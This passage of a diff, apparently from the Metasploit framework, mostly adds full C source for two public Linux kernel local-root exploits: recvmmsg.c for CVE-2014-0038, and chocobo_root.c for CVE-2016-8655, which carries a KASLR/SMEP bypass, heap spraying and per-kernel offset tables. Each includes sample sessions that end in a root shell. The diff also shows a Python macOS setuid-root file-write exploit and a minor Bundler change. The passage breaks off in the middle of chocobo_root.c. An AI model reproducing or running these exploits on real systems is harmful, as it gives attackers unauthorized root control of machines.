+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
+
 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -1,11 +0,0 @@
-#!/bin/sh
-
-gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
-strip cpuinfo.ia32.bin && \
-gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
-strip cpuinfo.ia64.bin && \
-i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
-strip cpuinfo.exe
-
-ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
-
@@ -1,64 +0,0 @@
-// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
-
-/*
-#!/usr/bin/env ruby
-#    This file is part of Metasm, the Ruby assembly manipulation suite
-#    Copyright (C) 2006-2009 Yoann GUILLOT
-#
-#    Licence is LGPL, see LICENCE in the top-level directory
-
-
-#
-# this sample shows the compilation of a slightly more complex program
-# it displays in a messagebox the result of CPUID
-#
-
-*/
-
-#include <unistd.h>
-#include <stdio.h>
-
-static char *featureinfo[32] = {
-	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
-	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
-	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
-	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
-}, *extendinfo[32] = {
-	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
-	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
-	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
-	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
-};
-
-#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
-#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
-int main(void)
-{
-
-	unsigned long eax, ebx, ecx, edx;
-	unsigned long i;
-
-	cpuid(0);
-	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
-
-	cpuid(1);
-	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
-			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
-	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
-			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
-
-	fprintf(stdout, "FLAGS:");
-	for (i=0 ; i<32 ; i++)
-		if (edx & (1 << i))
-			fprintf(stdout, " %s", featureinfo[i]);
-
-	for (i=0 ; i<32 ; i++)
-		if (ecx & (1 << i))
-			fprintf(stdout, " %s", extendinfo[i]);
-
-	fprintf(stdout, "\n");
-	fflush(stdout);
-
-	return 0;
-}
-
@@ -0,0 +1,226 @@
+/* 
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+recvmmsg.c - linux 3.4+ local root (CONFIG_X86_X32=y)
+CVE-2014-0038 / x32 ABI with recvmmsg
+by rebel @ irc.smashthestack.org
+-----------------------------------
+
+takes about 13 minutes to run because timeout->tv_sec is decremented
+once per second and 0xff*3 is 765.
+
+some things you could do while waiting:
+  * watch http://www.youtube.com/watch?v=OPyZGCKu2wg 3 times
+  * read https://wiki.ubuntu.com/Security/Features and smirk a few times
+  * brew some coffee
+  * stare at the countdown giggly with anticipation
+
+could probably whack the high bits of some pointer with nanoseconds,
+but that would require a bunch of nulls before the pointer and then
+reading an oops from dmesg which isn't that elegant.
+
+&net_sysctl_root.permissions is nice because it has 16 trailing nullbytes
+
+hardcoded offsets because I only saw this on ubuntu & kallsyms is protected
+anyway..
+
+same principle will work on 32bit but I didn't really find any major
+distros shipping with CONFIG_X86_X32=y
+
+user@ubuntu:~$ uname -a
+Linux ubuntu 3.11.0-15-generic #23-Ubuntu SMP Mon Dec 9 18:17:04 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ gcc recvmmsg.c -o recvmmsg
+user@ubuntu:~$ ./recvmmsg
+byte 3 / 3.. ~0 secs left.     
+w00p w00p!
+# id
+uid=0(root) gid=0(root) groups=0(root)
+# sh phalanx-2.6b-x86_64.sh
+unpacking..
+
+:)=
+
+greets to my homeboys kaliman, beist, capsl & all of #social
+
+Sat Feb  1 22:15:19 CET 2014
+% rebel %
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
+*/
+
+#define _GNU_SOURCE
+#include <netinet/ip.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/utsname.h>
+
+#define __X32_SYSCALL_BIT 0x40000000
+#undef __NR_recvmmsg
+#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
+#define VLEN 1
+#define BUFSIZE 200
+
+int port;
+
+struct offset {
+    char *kernel_version;
+    unsigned long dest; // net_sysctl_root + 96
+    unsigned long original_value; // net_ctl_permissions
+    unsigned long prepare_kernel_cred;
+    unsigned long commit_creds;
+};
+
+struct offset offsets[] = {
+    {"3.11.0-15-generic",0xffffffff81cdf400+96,0xffffffff816d4ff0,0xffffffff8108afb0,0xffffffff8108ace0}, // Ubuntu 13.10
+    {"3.11.0-12-generic",0xffffffff81cdf3a0,0xffffffff816d32a0,0xffffffff8108b010,0xffffffff8108ad40}, // Ubuntu 13.10
+    {"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04
+    {NULL,0,0,0,0}
+};
+
+void udp(int b) {
+    int sockfd;
+    struct sockaddr_in servaddr,cliaddr;
+    int s = 0xff+1;
+
+    if(fork() == 0) {
+        while(s > 0) {
+            fprintf(stderr,"\rbyte %d / 3.. ~%d secs left    \b\b\b\b",b+1,3*0xff - b*0xff - (0xff+1-s));
+            sleep(1);
+            s--;
+            fprintf(stderr,".");
+        }
+
+        sockfd = socket(AF_INET,SOCK_DGRAM,0);
+        bzero(&servaddr,sizeof(servaddr));
+        servaddr.sin_family = AF_INET;
+        servaddr.sin_addr.s_addr=htonl(INADDR_LOOPBACK);
+        servaddr.sin_port=htons(port);
+        sendto(sockfd,"1",1,0,(struct sockaddr *)&servaddr,sizeof(servaddr));
+        exit(0);
+    }
+
+}
+
+void trigger() {
+    open("/proc/sys/net/core/somaxconn",O_RDONLY);
+
+    if(getuid() != 0) {
+        fprintf(stderr,"not root, ya blew it!\n");
+        exit(-1);
+    }
+
+    fprintf(stderr,"w00p w00p!\n");
+    system("/bin/sh -i");
+}
+
+typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+_commit_creds commit_creds;
+_prepare_kernel_cred prepare_kernel_cred;
+
+// thx bliss
+static int __attribute__((regparm(3)))
+getroot(void *head, void * table)
+{
+    commit_creds(prepare_kernel_cred(0));
+    return -1;
+}
+
+void __attribute__((regparm(3)))
+trampoline()
+{
+    asm("mov $getroot, %rax; call *%rax;");
+}
+
+int main(void)
+{
+    int sockfd, retval, i;
+    struct sockaddr_in sa;
+    struct mmsghdr msgs[VLEN];
+    struct iovec iovecs[VLEN];
+    char buf[BUFSIZE];
+    long mmapped;
+    struct utsname u;
+    struct offset *off = NULL;
+
+    uname(&u);
+
+    for(i=0;offsets[i].kernel_version != NULL;i++) {
+        if(!strcmp(offsets[i].kernel_version,u.release)) {
+            off = &offsets[i];
+            break;
+        }
+    }
+
+    if(!off) {
+        fprintf(stderr,"no offsets for this kernel version..\n");
+        exit(-1);
+    }
+
+    mmapped = (off->original_value  & ~(sysconf(_SC_PAGE_SIZE) - 1));
+    mmapped &= 0x000000ffffffffff;
+
+        srand(time(NULL));
+    port = (rand() % 30000)+1500;
+
+    commit_creds = (_commit_creds)off->commit_creds;
+    prepare_kernel_cred = (_prepare_kernel_cred)off->prepare_kernel_cred;
+
+    mmapped = (long)mmap((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
+
+    if(mmapped == -1) {
+        perror("mmap()");
+        exit(-1);
+    }
+
+    memset((char *)mmapped,0x90,sysconf(_SC_PAGE_SIZE)*3);
+
+    memcpy((char *)mmapped + sysconf(_SC_PAGE_SIZE), (char *)&trampoline, 300);
+
+    if(mprotect((void *)mmapped, sysconf(_SC_PAGE_SIZE)*3, PROT_READ|PROT_EXEC) != 0) {
+        perror("mprotect()");
+        exit(-1);
+    }
+    
+    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+    if (sockfd == -1) {
+        perror("socket()");
+        exit(-1);
+    }
+
+    sa.sin_family = AF_INET;
+    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+    sa.sin_port = htons(port);
+
+    if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
+        perror("bind()");
+        exit(-1);
+    }
+
+    memset(msgs, 0, sizeof(msgs));
+
+    iovecs[0].iov_base = &buf;
+    iovecs[0].iov_len = BUFSIZE;
+    msgs[0].msg_hdr.msg_iov = &iovecs[0];
+    msgs[0].msg_hdr.msg_iovlen = 1;
+
+    for(i=0;i < 3 ;i++) {
+        udp(i);
+        retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);
+        if(!retval) {
+            fprintf(stderr,"\nrecvmmsg() failed\n");
+        }
+    }
+
+    close(sockfd); 
+
+    fprintf(stderr,"\n");
+
+    trigger();
+}
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -0,0 +1,945 @@
+/*
+chocobo_root.c
+linux AF_PACKET race condition exploit for CVE-2016-8655.
+Includes KASLR and SMEP/SMAP bypasses.
+For Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.
+All kernel offsets have been tested on Ubuntu / Linux Mint.
+
+vroom vroom
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+user@ubuntu:~$ uname -a
+Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
+user@ubuntu:~$ id
+uid=1000(user) gid=1000(user) groups=1000(user)
+user@ubuntu:~$ gcc chocobo_root.c -o chocobo_root -lpthread
+user@ubuntu:~$ ./chocobo_root
+linux AF_PACKET race condition exploit by rebel
+kernel version: 4.4.0-51-generic #72
+proc_dostring = 0xffffffff81088090
+modprobe_path = 0xffffffff81e48f80
+register_sysctl_table = 0xffffffff812879a0
+set_memory_rw = 0xffffffff8106f320
+exploit starting
+making vsyscall page writable..
+
+new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 174222, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+vsyscall page altered!
+
+
+stage 1 completed
+registering new sysctl..
+
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 30773, last val = 0)
+current packet version = 2
+pbd->hdr.bh1.offset_to_first_pkt = 48
+race not won
+
+retrying stage..
+new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
+sockets allocated
+removing barrier and spraying..
+version switcher stopping, x = -1 (y = 133577, last val = 2)
+current packet version = 0
+pbd->hdr.bh1.offset_to_first_pkt = 48
+*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
+please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
+closing socket and verifying.......
+sysctl added!
+
+stage 2 completed
+binary executed by kernel, launching rootshell
+root@ubuntu:~# id
+uid=0(root) gid=0(root) groups=0(root),1000(user)
+
+*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
+
+Shoutouts to:
+jsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)
+mcdelivery for delivering hotcakes and coffee
+
+11/2016
+by rebel
+---
+Updated by <bcoles@gmail.com>
+- check number of CPU cores
+- KASLR bypasses
+- additional kernel targets
+https://github.com/bcoles/kernel-exploits/tree/cve-2016-8655
+*/
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <poll.h>
+#include <pthread.h>
+#include <sched.h>
+#include <signal.h>
+#include <stdbool.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/sysinfo.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/sched.h>
+#include <netinet/tcp.h>
+#include <netinet/if_ether.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS 1
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions()
+int kernel = -1;
+
+// New sysctl path
+const char *SYSCTL_NAME = "hack";
+const char *SYSCTL_PATH = "/proc/sys/hack";
+
+volatile int barrier = 1;
+volatile int vers_switcher_done = 0;
+
+struct kernel_info {
+    char *kernel_version;
+    unsigned long proc_dostring;
+    unsigned long modprobe_path;
+    unsigned long register_sysctl_table;
+    unsigned long set_memory_rw;
+};
+
+struct kernel_info kernels[] = {
+    { "4.4.0-21-generic #37~14.04.1-Ubuntu", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },
+    { "4.4.0-22-generic #40~14.04.1-Ubuntu", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },
+    { "4.4.0-24-generic #43~14.04.1-Ubuntu", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },
+    { "4.4.0-28-generic #47~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },
+    { "4.4.0-31-generic #50~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },
+    { "4.4.0-34-generic #53~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },
+    { "4.4.0-36-generic #55~14.04.1-Ubuntu", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },
+    { "4.4.0-38-generic #57~14.04.1-Ubuntu", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },
+    { "4.4.0-42-generic #62~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274300, 0x06b880 },
+    { "4.4.0-45-generic #66~14.04.1-Ubuntu", 0x084260, 0xe4b100, 0x274340, 0x06b880 },
+    //{"4.4.0-46-generic #67~14.04.1-Ubuntu",0x0842f0,0xe4b100,0x274580,0x06b880},
+    { "4.4.0-47-generic #68~14.04.1-Ubuntu", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },
+    //{"4.4.0-49-generic #70~14.04.1-Ubuntu",0x084350,0xe4b100,0x274b10,0x06b880},
+    { "4.4.0-51-generic #72~14.04.1-Ubuntu", 0x084350, 0xe4b100, 0x274750, 0x06b880 },
+
+    { "4.4.0-21-generic #37-Ubuntu", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },
+    { "4.4.0-22-generic #40-Ubuntu", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },
+    { "4.4.0-24-generic #43-Ubuntu", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },
+    { "4.4.0-28-generic #47-Ubuntu", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },
+    { "4.4.0-31-generic #50-Ubuntu", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },
+    { "4.4.0-34-generic #53-Ubuntu", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },
+    { "4.4.0-36-generic #55-Ubuntu", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },
+    { "4.4.0-38-generic #57-Ubuntu", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },
+    { "4.4.0-42-generic #62-Ubuntu", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },
+    { "4.4.0-43-generic #63-Ubuntu", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },
+    { "4.4.0-45-generic #66-Ubuntu", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },
+    //{"4.4.0-46-generic #67-Ubuntu",0x088040,0xe48f80,0x287800,0x06f320},
+    { "4.4.0-47-generic #68-Ubuntu", 0x088040, 0xe48f80, 0x287800, 0x06f320 },
+    //{"4.4.0-49-generic #70-Ubuntu",0x088090,0xe48f80,0x287d40,0x06f320},
+    { "4.4.0-51-generic #72-Ubuntu", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},
+};
+
+#define VSYSCALL              0xffffffffff600000
+#define PROC_DOSTRING         (KERNEL_BASE + kernels[kernel].proc_dostring)
+#define MODPROBE_PATH         (KERNEL_BASE + kernels[kernel].modprobe_path)
+#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)
+#define SET_MEMORY_RW         (KERNEL_BASE + kernels[kernel].set_memory_rw)
+
+#define KMALLOC_PAD 64
+
+int pad_fds[KMALLOC_PAD];
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+struct ctl_table {
+    const char *procname;
+    void *data;
+    int maxlen;
+    unsigned short mode;
+    struct ctl_table *child;
+    void *proc_handler;
+    void *poll;
+    void *extra1;
+    void *extra2;
+};
+
+#define CONF_RING_FRAMES 1
+
+struct tpacket_req3 tp;
+int sfd;
+int mapped = 0;
+
+struct timer_list {
+    void *next;
+    void *prev;
+    unsigned long           expires;
+    void                    (*function)(unsigned long);
+    unsigned long           data;
+    unsigned int            flags;
+    int                     slack;
+};
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void *setsockopt_thread(void *arg)
+{
+    while (barrier) {}
+    setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));
+
+    return NULL;
+}
+
+void *vers_switcher(void *arg)
+{
+    int val,x,y;
+
+    while (barrier) {}
+
+    while (1) {
+        val = TPACKET_V1;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        y++;
+
+        if (x != 0) break;
+
+        val = TPACKET_V3;
+        x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+        if (x != 0) break;
+
+        y++;
+    }
+
+    dprintf("[.] version switcher stopping, x = %d (y = %d, last val = %d)\n",x,y,val);
+    vers_switcher_done = 1;
+
+    return NULL;
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+#define BUFSIZE 1408
+char exploitbuf[BUFSIZE];
+
+void kmalloc(void)
+{
+    while(1)
+        syscall(__NR_add_key, "user", "wtf", exploitbuf, BUFSIZE - 24, -2);
+}
+
+void pad_kmalloc(void)
+{
+    int x;
+    for (x = 0; x < KMALLOC_PAD; x++)
+        if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {
+            dprintf("[-] pad_kmalloc() socket error\n");
+            exit(EXIT_FAILURE);
+        }
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+int try_exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    pthread_t setsockopt_thread_thread,a;
+    int val;
+    socklen_t l;
+    struct timer_list *timer;
+    int fd;
+    struct tpacket_block_desc *pbd;
+    int off;
+    sigset_t set;
+
+    sigemptyset(&set);
+
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(1);
+    }
+
+    dprintf("[.] new exploit attempt starting, jumping to %p, arg=%p\n", (void *)func, (void *)arg);
+
+    pad_kmalloc();
+
+    fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+
+    if (fd == -1) {
+        dprintf("[-] target socket error\n");
+        exit(1);
+    }
+
+    pad_kmalloc();
+
+    dprintf("[.] done, sockets allocated\n");
+
+    val = TPACKET_V3;
+
+    setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));
+
+    tp.tp_block_size = CONF_RING_FRAMES * getpagesize();
+    tp.tp_block_nr = 1;
+    tp.tp_frame_size = getpagesize();
+    tp.tp_frame_nr = CONF_RING_FRAMES;
+
+    // try to set the timeout to 10 seconds
+    // the default timeout might still be used though depending on when the race was won
+    tp.tp_retire_blk_tov = 10000;
+
+    sfd = fd;
+
+    if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {
+        dprintf("[-] Error creating thread\n");
+        return 1;
+    }
+
+    pthread_create(&a, NULL, vers_switcher, (void *)NULL);
+
+    usleep(200000);
+
+    dprintf("[.] removing barrier and spraying...\n");
+
+    memset(exploitbuf, '\x00', BUFSIZE);
+
+    timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);
+    timer->next = 0;
+    timer->prev = 0;
+
+    timer->expires = 4294943360;
+    timer->function = (void *)func;
+    timer->data = arg;
+    timer->flags = 1;
+    timer->slack = -1;
+
+    barrier = 0;
+
+    usleep(100000);
+
+    while (!vers_switcher_done) usleep(100000);
+
+    l = sizeof(val);
+    getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);
+
+    dprintf("[.] current packet version = %d\n",val);
+
+    pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);
+
+    if (pbd == MAP_FAILED) {
+        dprintf("[-] could not map pbd\n");
+        exit(1);
+    } else {
+        off = pbd->hdr.bh1.offset_to_first_pkt;
+        dprintf("[.] pbd->hdr.bh1.offset_to_first_pkt = %d\n", off);
+    }
+
+
+    if (val == TPACKET_V1 && off != 0) {
+        dprintf("*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\n");
+    } else {
+        dprintf("[-] race not won\n");
+        exit(2);
+    }
+
+    munmap(pbd, tp.tp_block_size * tp.tp_block_nr);
+
+    pthread_create(&a, NULL, verification_func, (void *)NULL);
+
+    dprintf("\n");
+    dprintf("[!] please wait up to a few minutes for timer to be executed.\n");
+    dprintf("[!] if you ctrl-c now the kernel will hang. so don't do that.\n");
+    dprintf("\n");
+
+    sleep(1);
+    dprintf("[.] closing socket and verifying...\n");
+
+    close(sfd);
+
+    kmalloc();
+
+    dprintf("[.] all messages sent\n");
+
+    sleep(31337);
+    exit(1);
+}
+
+int verification_result = 0;
+
+void catch_sigsegv(int sig)
+{
+    verification_result = 0;
+    pthread_exit((void *)1);
+}
+
+void *modify_vsyscall(void *arg)
+{
+    unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);
+    unsigned long x = (unsigned long)arg;
+
+    sigset_t set;
+    sigemptyset(&set);
+    sigaddset(&set, SIGSEGV);
+
+    if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {
+        dprintf("[-] couldn't set sigmask\n");
+        exit(EXIT_FAILURE);
+    }
+
+    signal(SIGSEGV, catch_sigsegv);
+
+    *vsyscall = 0xdeadbeef+x;
+
+    if (*vsyscall == 0xdeadbeef+x) {
+        dprintf("[~] vsyscall page altered!\n");
+        verification_result = 1;
+        pthread_exit(0);
+    }
+
+    return NULL;
+}
+
+void verify_stage1(void)
+{
+    pthread_t v_thread;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        pthread_create(&v_thread, NULL, modify_vsyscall, 0);
+
+        pthread_join(v_thread, NULL);
+
+        if(verification_result == 1) {
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not modify vsyscall\n");
+    exit(EXIT_FAILURE);
+}
+
+void verify_stage2(void)
+{
+    struct stat b;
+
+    sleep(5);
+
+    int x;
+    for(x = 0; x < 300; x++) {
+
+        if (stat(SYSCTL_PATH, &b) == 0) {
+            dprintf("[~] sysctl added!\n");
+            exit(0);
+        }
+
+        write(2,".",1);
+        sleep(1);
+    }
+
+    dprintf("[-] could not add sysctl\n");
+    exit(EXIT_FAILURE);
+}
+
+void exploit(unsigned long func, unsigned long arg, void *verification_func)
+{
+    int status;
+    int pid;
+
+retry:
+
+    pid = fork();
+
+    if (pid == 0) {
+        try_exploit(func, arg, verification_func);
+        exit(1);
+    }
+
+    wait(&status);
+
+    dprintf("\n");
+
+    if (WEXITSTATUS(status) == 2) {
+        dprintf("[.] retrying stage...\n");
+        kill(pid, 9);
+        sleep(2);
+        goto retry;
+    }
+
+    if (WEXITSTATUS(status) != 0) {
+        dprintf("[-] something bad happened, aborting exploit attempt\n");
+        exit(EXIT_FAILURE);
+    }
+
+    kill(pid, 9);
+}
+
+
+void wrapper(void)
+{
+    struct ctl_table *c;
+
+    dprintf("[.] making vsyscall page writable...\n\n");
+
+    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
+
+    dprintf("[~] done, stage 1 completed\n");
+
+    sleep(5);
+
+    dprintf("[.] registering new sysctl...\n\n");
+
+    c = (struct ctl_table *)(VSYSCALL+0x850);
+
+    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
+
+    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
+    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
+    c->procname = (char *)(VSYSCALL+0xf00);
+    c->mode = 0666;
+    c->proc_handler = (void *)(PROC_DOSTRING);
+    c->data = (void *)(MODPROBE_PATH);
+    c->maxlen = 256;
+    c->extra1 = (void *)(VSYSCALL+0xe00);
+    c->extra2 = (void *)(VSYSCALL+0xd00);
+
+    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
+
+    dprintf("[~] done, stage 2 completed\n");
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+void check_procs() {
+    int min_procs = 2;
+
+    int nprocs = 0;
+    nprocs = get_nprocs_conf();
+
+    if (nprocs < min_procs) {
+        dprintf("[-] system has less than %d processor cores\n", min_procs);
+        exit(EXIT_FAILURE);
+    }
+
+    dprintf("[.] system has %d processor cores\n", nprocs);
+}
+
+struct utsname get_kernel_version() {
+    struct utsname u;
+    int rv = uname(&u);
+    if (rv != 0) {
+        dprintf("[-] uname())\n");
+        exit(EXIT_FAILURE);
+    }
+    return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+void detect_versions() {
+    struct utsname u;
+    char kernel_version[512];
+
+    u = get_kernel_version();
+
+    if (strstr(u.machine, "64") == NULL) {
+        dprintf("[-] system is not using a 64-bit kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (strstr(u.version, "-Ubuntu") == NULL) {
+        dprintf("[-] system is not using an Ubuntu kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    char *u_ver = strtok(u.version, " ");
+    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+
+    int i;
+    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+        if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+            dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+            kernel = i;
+            return;
+        }
+    }
+
+    dprintf("[-] kernel version not recognized\n");
+    exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+bool mmap_syslog(char** buffer, int* size) {
